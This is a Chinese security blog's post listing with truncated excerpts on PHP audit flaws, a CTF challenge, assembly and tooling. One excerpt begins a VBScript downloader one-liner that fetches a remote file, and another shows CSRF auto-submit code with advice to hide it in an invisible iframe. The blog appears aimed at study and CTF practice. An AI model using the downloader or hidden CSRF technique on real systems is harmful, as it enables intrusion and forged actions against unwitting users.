- 博客(9)
- 资源 (22)
- 收藏
- 关注
原创 php审计基础五:逻辑处理漏洞
(1)in_array函数in_array() 函数搜索数组中是否存在指定的值但是这个这个函数会在比较前做类型转换比如缺陷代码为:<?phpif(in_array($_GET['typeid'], array(1,2,3,4,5))){ $sql="select * from hehe where typeid='".$_GET['typeid']."'"; ech
2016-09-23 17:34:09 1053 1
原创 php审计基础四:变量覆盖
(1)extract()函数:extract() 函数从数组中将变量导入到当前的符号表。该函数使用数组键名作为变量名,使用数组键值作为变量值。针对数组中的每个元素,将在当前符号表中创建对应的一个变量。当代码是:<?php$b=3;$a=array('b'=>'1');extract($a);print_r($b);b的值被覆盖,输出的值变成1当缺陷代码为:<?php
2016-09-23 14:34:33 2073 2
原创 2016xctf一道ctf题目
首先是index.php:<?php$user = $_GET["user"];$file = $_GET["file"];$pass = $_GET["pass"];if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){ echo "hello admin!"; if(preg_
2016-09-22 15:53:28 39320 2
原创 php审计基础三:php封装协议小总结
【1】php://stdin主要用于php cli 的输入应用:<?while($line = fopen('php://stdin','r')){ echo fgets($line);}?>【2】php://stdout主要用于php cli的输出应用:<?php$fh = fopen('php://stdout', 'w')
2016-09-21 12:49:28 3182
原创 汇编的一个小笔记(call和ret)
ret:pop ipretf:pop ippop cscall 标号:push ip jmp near ptr 标号call far ptr 标号:push cs push ipjmp far ptr 标号call 16位reg(例如:ax,bx,cx):push ipjmp 16位reg
2016-09-14 01:04:32 498
原创 王爽汇编实验9
这个是自己的一点理解,首先上源代码:assume cs:codesgcodesg segment mov ax,4c00h int 21h start: mov ax,0 s: nop nop mov di,offset s mov si,offset s2 mov ax,cs:[si] mov
2016-09-13 16:08:46 947
原创 各种一句话(持续更新)
转自冷风大神的文章:http://blog.csdn.net/chinafe/article/details/46860051echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open ^"get^",wsh.arguments(0),0:w.send:
2016-09-09 20:57:03 964
原创 一段csrf利用代码
function test(){ document.getElementById("myform").submit(); }上面是利用post形式进行传递参数下面是get方式进行传递参数为了让上面的代码更具有隐蔽行,把上面的代码保存成1.html,然后下面用框架包含,并且把框架长,宽都设置成0,这样就能杀人于无形了
2016-09-09 20:16:38 1693
原创 使用Vs2015开发linux(centos7)程序
1.首先下载vs2015 with update3 2.然后下载Visual C++ for Linux Development(https://visualstudiogallery.msdn.microsoft.com/725025cf-7067-45c2-8d01-1e0fd359ae6e)Ps:另一篇文章介绍这个:(https://blogs.msdn.microsoft.co
2016-09-07 16:04:35 11924 1
2019年11月最新nessus插件更新包.zip
2019-11-22
python动态代码审计
2018-08-30
2016 SWPU CTF web4
2016-10-31
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人